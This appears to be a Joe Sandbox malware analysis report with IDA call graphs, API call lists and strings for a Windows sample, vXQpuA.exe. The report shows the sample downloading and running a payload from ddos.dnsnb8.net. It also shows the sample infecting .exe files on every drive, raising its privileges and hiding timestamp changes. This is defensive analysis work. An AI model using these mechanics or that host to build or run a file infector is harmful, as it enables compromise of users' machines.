                                                611e6e: -> 611df6 (strrchr; 611e13 lstrcpy strrchr; 611e40 lstrcmpiA; 611e52 lstrlen); 611eb0 SetFileAttributesA CreateFileA; -> 611915 (via 611edf); -> 611c81 (from 611f2e, 611f92, 6120f5); -> 611af9 (from 611f9f, 612024, 61207a, 611fc0; 169 API calls each); 612013 FlushViewOfFile; 6120bb memset memset; 612226 memcpy UnmapViewOfFile CloseHandle; -> 611b8a; 61226e -> 61185b; 6122ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile; -> 611915 (3 API calls); 61231f CloseHandle; 61233d UnmapViewOfFile; 61234b and 612356 FindCloseChangeNotification
                                                611915: 611924 SetFilePointer CreateFileMappingA MapViewOfFile; 61192e memset GetFileTime; 611954 SetFileTime
                                                611c81: 611c94 -> 61185b; 611cae memset memset
                                                611b8a: 611b93 -> 61185b; 611bca srand; 611bd8 rand (loop through 611c08); 611c29 memset memcpy lstrcat
                                                61239d: strstr; 612451 CreateFileA GetFileSize; 612499 -> 611915; 6124a4 (9 API calls) -> 61189d; 61255c Sleep memset wsprintfA -> 6129e2 (163 API calls); 612597 memset wsprintfA Sleep -> 61189d (6 API calls); 6125e4 Sleep CreateFileA -> 611915; 612610 CloseHandle; 612641 SetFilePointer WriteFile; 612667 SetEndOfFile; 612675 CloseHandle; 61267c RemoveDirectoryA
                                                61189d: memset CreateProcessA; 6118e0 CloseHandle WaitForSingleObject; 6118fb GetExitCodeProcess; 611907 CloseHandle
                                                612692: 6126a2 CreateEventA; 6126b2 WaitForSingleObject; 6126c1 lstrlen ??2@YAPAXI; 6126da lstrcpy; 612718 lstrcpy ??3@YAXPAX; 612736 SetEvent
                                                612845 (thread started at 612c2a): -> 61274a; 612878 DeleteFileA; 61288c VirtualFree; 6128a4 CloseHandle; from 612853 -> 612692 (8 API calls) and -> 61239d (186 API calls)
                                                61274a: memset memset SHGetSpecialFolderPathA wsprintfA; -> 61185b; 6127b5 wsprintfA CopyFileA; 6127de wsprintfA -> 611973 (17 API calls); 612813 DeleteFileA; 612820 CreateFileA
                                                612361 (no recorded caller): 61236b UnmapViewOfFile; 612379 CloseHandle; 612388 CloseHandle
                                                616076 (no recorded caller): 6160b0 and 6160d5 VirtualAlloc; 61615f and 616198 VirtualFree; 616389, 6163e7 and 6163fc VirtualProtect

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
[Callgraph; interactive graph omitted. 53 functions: Function_00611000, 00611099, 0061119F, 0061120E, 00611319, 0061139F, 006114E1, 00611581, 00611638, 00611718, 006117D0, 0061185B, 0061189D, 00611915, 00611973, 00611AF9, 00611B8A, 00611C68, 00611C81, 00611D8A, 00611DF6, 00611E6E, 00612361, 0061235D, 0061239D, 00612692, 0061274A, 00612845, 006128B8, 006129E2, 00612B7D, 00612B8C, 00612C48, 00612CF0, 00612D60, 00612D9B, 00616001, 0061600A, 0061605E, 00616076, 006165A6, 006166C8, 00616734, 006167A4, 0061680F, 00616834, 006169B0, 00616A84, 00616B02, 00616B63, 00616CF2, 00616CF8, 00616D00, with the call edges shown in the graph.]

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
[Control-flow graph for 6129e2-612b7a; interactive graph omitted. Blocks reference memset, wsprintfA, lstrlen, lstrcpyn, strrchr, lstrcmpiA, FindFirstFileA, FindNextFileA, FindClose and subcall 6128b8.]
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                • String ID: %s*$C:\$Documents and Settings
                                                • API String ID: 2826467728-110786608
                                                • Opcode ID: c28782c76d0151406301db8eb819f0bcfa0fda903783e04df2321965597381b4
                                                • Instruction ID: 36a9edbd0ef466ab30e62cd0397264d21bed5f24fd678e045e9ef842dd68c828
                                                • Opcode Fuzzy Hash: c28782c76d0151406301db8eb819f0bcfa0fda903783e04df2321965597381b4
                                                • Instruction Fuzzy Hash: 2C4186B240434AAFD720DFA0DC89DDB77EDEB84315F08482AF545D3211E634D69887A6

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
[Control-flow graph for 611099-61119c; interactive graph omitted. Blocks reference wsprintfA, URLDownloadToFileA, lstrlen, Sleep, WinExec and subcalls 61185b and 611000.]
                                                APIs
                                                  • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                • WinExec.KERNEL32(?,00000005), ref: 006110F1
                                                • lstrlen.KERNEL32(00614748), ref: 006110FA
                                                • wsprintfA.USER32 ref: 0061112A
                                                • wsprintfA.USER32 ref: 00611143
                                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0061115B
                                                • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00611169
                                                • Sleep.KERNELBASE ref: 00611179
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGa$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                • API String ID: 1280626985-3133690350
                                                • Opcode ID: dd811f5023a791330159270864cd53e628209eaa8919bc64cd325d1460f8777b
                                                • Instruction ID: 4955d13efe3e3bd299cfcc4b9f6dcdb8bf949d15c8c180b90fe6533efed0e477
                                                • Opcode Fuzzy Hash: dd811f5023a791330159270864cd53e628209eaa8919bc64cd325d1460f8777b
                                                • Instruction Fuzzy Hash: C421A175900218BACB20DBA0DC45BEEBBBFAB16316F1D8096E601A7150DB745BC4CFA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
[Control-flow graph for 611718-6117cd; interactive graph omitted. Blocks reference GetSystemTimeAsFileTime, SHSetValueA, SHGetValueA and two subcalls to 612cf0.]
                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 00611729
                                                • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0061174C
                                                • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0061177C
                                                • __aulldiv.LIBCMT ref: 00611796
                                                • __aulldiv.LIBCMT ref: 006117A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: TimeValue__aulldiv$FileSystem
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe$SOFTWARE\GTplus$Time
                                                • API String ID: 541852442-2972129706
                                                • Opcode ID: 53d6569b406a5c48a8f7f71cef2960f4751b77c2b8bd2883aedb7160c65e90b9
                                                • Instruction ID: 6bc131a6a4fe29481fbab03d04caf538678dbf6b995c0e8f1b879f62585c7812
                                                • Opcode Fuzzy Hash: 53d6569b406a5c48a8f7f71cef2960f4751b77c2b8bd2883aedb7160c65e90b9
                                                • Instruction Fuzzy Hash: 9E115B75A00219BBDF109B94CC86FEF7BBEEB45B14F148115FA01F6380D6719A84C764

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
[Control-flow graph for 616076-616608; interactive graph omitted. Blocks reference VirtualAlloc, VirtualFree, VirtualProtect and subcall 6166c8.]
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 006160BE
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 006160DF
                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00616189
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006161A5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 02dc5fe221819462dfd5e064bdceb7b5f392faf15b45c933a697e7e25efb7faa
                                                • Instruction ID: bd72c008df2b22384575577a27fc67ead3e1937aa41c4a1304f0da879fa0050a
                                                • Opcode Fuzzy Hash: 02dc5fe221819462dfd5e064bdceb7b5f392faf15b45c933a697e7e25efb7faa
                                                • Instruction Fuzzy Hash: 741245B65087859FDB32CF64CC45BEA3BB2EF02310F1C45ADE8898B293D674A981C755

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
[Control-flow graph for 612b8c-612c45; interactive graph omitted. Blocks reference memset, GetLogicalDriveStringsA, GetDriveTypeA, lstrlen, CreateThread and WaitForMultipleObjects.]
                                                APIs
                                                • memset.MSVCRT ref: 00612BA6
                                                • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00612BB4
                                                • GetDriveTypeA.KERNELBASE(?), ref: 00612BD3
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00612BEE
                                                • lstrlen.KERNEL32(?), ref: 00612BFB
                                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00612C16
                                                • CreateThread.KERNEL32(00000000,00000000,00612845,00000000,00000000,00000000), ref: 00612C3A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                • String ID:
                                                • API String ID: 1073171358-0
                                                • Opcode ID: f7e84ee5a88acd26e701878d9f84075548c5d70e74a725a1a5055a977728831a
                                                • Instruction ID: f267273a0d1b7a750d8bf8fbafc0be1d5d27e687dc2846714e68709378deae18
                                                • Opcode Fuzzy Hash: f7e84ee5a88acd26e701878d9f84075548c5d70e74a725a1a5055a977728831a
                                                • Instruction Fuzzy Hash: 8421D5B180015EAFEB209F64AC84DEF7BAFFB08349B1D012AF94293251D7208D56CB60

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
[Control-flow graph for 611e6e-61239a; interactive graph omitted. Blocks reference SetFileAttributesA, CreateFileA, SetFilePointer, CreateFileMappingA, MapViewOfFile, FlushViewOfFile, UnmapViewOfFile, FindCloseChangeNotification, memset, memcpy, CloseHandle, SetEndOfFile, WriteFile and subcalls 612d60, 611d8a, 611df6, 611915, 611c81, 61185b, 611af9, 611c68, 611b8a and 612d9b.]
                                                APIs
                                                • SetFileAttributesA.KERNELBASE(?,00000080,?,006132B0,00000164,00612986,?), ref: 00611EB9
                                                • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00611ECD
                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00611EF3
                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00611F07
                                                • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000400), ref: 00611F1D
                                                • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0061201E
                                                • memset.MSVCRT ref: 006120D8
                                                • memset.MSVCRT ref: 006120EA
                                                • memcpy.MSVCRT ref: 0061222D
                                                • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00612238
                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0061224A
                                                • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122C6
                                                • SetEndOfFile.KERNELBASE(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122CB
                                                • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122DD
                                                • WriteFile.KERNELBASE(000000FF,00614008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122F7
                                                • WriteFile.KERNELBASE(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0061230D
                                                • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00612322
                                                • UnmapViewOfFile.KERNEL32(?,?,006132B0,00000164,00612986,?), ref: 00612340
                                                • FindCloseChangeNotification.KERNELBASE(?,?,006132B0,00000164,00612986,?), ref: 0061234E
                                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,006132B0,00000164,00612986,?), ref: 00612359
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                                • String ID: .@a$5@a$<@a$C@a$m@a
                                                • API String ID: 3349749541-1651383129
                                                • Opcode ID: 26bde03b186d386a4bf17692afa123f40b2a73d85586f3756303b0ea8b6f58fd
                                                • Instruction ID: 60dbcdbf8ec51ff9aee45437fd1cecdc0a1dbe02c7ea0e803346bb045ac9bd97
                                                • Opcode Fuzzy Hash: 26bde03b186d386a4bf17692afa123f40b2a73d85586f3756303b0ea8b6f58fd
                                                • Instruction Fuzzy Hash: F9F16E71900209EFCB20DFA4DC91AEDBBB6FF08314F18852AE519AB651D734AE91CF54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
[Control-flow graph for 611973-611af6; interactive graph omitted. Blocks reference PathFileExistsA, CreateFileA, Sleep, wsprintfA, CopyFileA, GetFileSize, VirtualAlloc, ReadFile, FindCloseChangeNotification, DeleteFileA, VirtualFree and subcall 61185b.]
                                                APIs
                                                • PathFileExistsA.KERNELBASE(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 00611992
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                • Sleep.KERNEL32(00000064), ref: 006119C6
                                                • wsprintfA.USER32 ref: 006119EC
                                                • CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                • GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00611A46
                                                • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00611A65
                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00611A90
                                                • DeleteFileA.KERNEL32(?), ref: 00611AA7
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00611AC1
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 006119DB
                                                • \Na`Na, xrefs: 00611980
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 0061197C
                                                • %s%.8X.data, xrefs: 006119E6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\vXQpuA.exe$\Na`Na
                                                • API String ID: 2523042076-2794851130
                                                • Opcode ID: 723bc10770dbc7640d11d3b3a95c653e58e9c0e0595209fa176e3abfed372a8d
                                                • Instruction ID: c67cb0a00aa23ca64eefc02f62e4814ed13199dc0dcdaf5fa232a6df2ff84f2b
                                                • Opcode Fuzzy Hash: 723bc10770dbc7640d11d3b3a95c653e58e9c0e0595209fa176e3abfed372a8d
                                                • Instruction Fuzzy Hash: AF515271901259EFCF109F94CC84AEEBFBAEF0A355F184569F616EA290D3309E90CB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 150 6128b8-6128ff memset wsprintfA 151 612905-61290d 150->151 152 6129db-6129df 150->152 151->152 153 612913-612919 151->153 154 612956-612965 strrchr 153->154 155 61291b-61294c memset wsprintfA call 6129e2 153->155 154->152 157 612967-612978 lstrcmpiA 154->157 160 612951 155->160 158 612988-612992 lstrcmpiA 157->158 159 61297a-612981 call 611e6e 157->159 158->152 162 612994-61299b 158->162 163 612986 159->163 160->152 164 6129ad-6129c9 strstr 162->164 165 61299d-6129a3 162->165 163->152 167 6129d3-6129d6 call 612692 164->167 168 6129cb-6129d1 call 61239d 164->168 165->164 166 6129a5-6129a7 lstrcpy 165->166 166->164 167->152 168->152
                                                APIs
                                                • memset.MSVCRT ref: 006128D3
                                                • wsprintfA.USER32 ref: 006128F7
                                                • memset.MSVCRT ref: 00612925
                                                • wsprintfA.USER32 ref: 00612940
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612A02
                                                  • Part of subcall function 006129E2: wsprintfA.USER32 ref: 00612A1A
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612A44
                                                  • Part of subcall function 006129E2: lstrlen.KERNEL32(?), ref: 00612A54
                                                  • Part of subcall function 006129E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00612A6C
                                                  • Part of subcall function 006129E2: strrchr.MSVCRT ref: 00612A7C
                                                  • Part of subcall function 006129E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00612A9F
                                                  • Part of subcall function 006129E2: lstrlen.KERNEL32(Documents and Settings), ref: 00612AAE
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612AC6
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612ADA
                                                  • Part of subcall function 006129E2: FindFirstFileA.KERNELBASE(?,?), ref: 00612AEF
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612B13
                                                • strrchr.MSVCRT ref: 00612959
                                                • lstrcmpiA.KERNEL32(00000001,exe), ref: 00612974
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                • API String ID: 3004273771-898104377
                                                • Opcode ID: b9da12d2179268b1e9b2c205e1aed13a02f8a5df0e69e32eb4baba4201895df4
                                                • Instruction ID: 6532814002a54596f2e8f6136d3fece380a265a67b8f33b3481bffbe38b7bad2
                                                • Opcode Fuzzy Hash: b9da12d2179268b1e9b2c205e1aed13a02f8a5df0e69e32eb4baba4201895df4
                                                • Instruction Fuzzy Hash: 5B31EA7194031E7BDB20A76ADC95FCA37AE9F14310F0D0857F545A3280E6B4DBD48BA0

                                                Control-flow Graph

                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0061164F
                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0061165B
                                                • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\vXQpuA.exe,00000104), ref: 0061166E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 006116AC
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006116BD
                                                  • Part of subcall function 0061139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 006113BC
                                                  • Part of subcall function 0061139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006113DA
                                                  • Part of subcall function 0061139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00611448
                                                • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 006116E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\vXQpuA.exe$C:\Windows\system32$Documents and Settings
                                                • API String ID: 123563730-542475441
                                                • Opcode ID: 63a3fb7ee5a35819c12fa68dfce180456dedf1e0bda332033de7eb1bb3e77268
                                                • Instruction ID: c1dcd9a03b00e10779a93785b5febaa4e8d71cddc91972bc84d479ab7e37c2ab
                                                • Opcode Fuzzy Hash: 63a3fb7ee5a35819c12fa68dfce180456dedf1e0bda332033de7eb1bb3e77268
                                                • Instruction Fuzzy Hash: BD11D6715001247BCF205BA0AD49EDB3EAFEF0B362F0D5016F30A992A0CA7145C0D7A1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 363 612c48-612c75 memset call 611973 366 612cb2-612cb9 363->366 367 612c77-612c7f 363->367 370 612cc8-612ccc 366->370 371 612cbb-612cc2 VirtualFree 366->371 368 612c81-612c8b 367->368 369 612c8f-612cac CreateThread WaitForMultipleObjects 367->369 368->369 369->366 371->370
                                                APIs
                                                • memset.MSVCRT ref: 00612C57
                                                  • Part of subcall function 00611973: PathFileExistsA.KERNELBASE(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 00611992
                                                  • Part of subcall function 00611973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                  • Part of subcall function 00611973: Sleep.KERNEL32(00000064), ref: 006119C6
                                                  • Part of subcall function 00611973: wsprintfA.USER32 ref: 006119EC
                                                  • Part of subcall function 00611973: CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                  • Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                  • Part of subcall function 00611973: GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                  • Part of subcall function 00611973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00611A46
                                                  • Part of subcall function 00611973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00611A65
                                                • CreateThread.KERNELBASE(00000000,00000000,00612B8C,00000000,00000000,00000000), ref: 00612C99
                                                • WaitForMultipleObjects.KERNEL32(00000001,006116BA,00000001,000000FF,?,006116BA,00000000), ref: 00612CAC
                                                • VirtualFree.KERNEL32(007F0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\vXQpuA.exe,00614E5C,00614E60,?,006116BA,00000000), ref: 00612CC2
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 00612C69
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                                • API String ID: 2042498389-3243034452
                                                • Opcode ID: 56fa2a4f66104d298270385df844c5d1f88bb007cc831c8059d5b28338dbec65
                                                • Instruction ID: e32badba721ac0a266cbaf12613a00ea936d93f0ddaab6ea5afafd462113c682
                                                • Opcode Fuzzy Hash: 56fa2a4f66104d298270385df844c5d1f88bb007cc831c8059d5b28338dbec65
                                                • Instruction Fuzzy Hash: DF01D4716412217BD75097949C1AEDF7FAEEF01B60F088115B605DA2C1D9A09990C7E0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
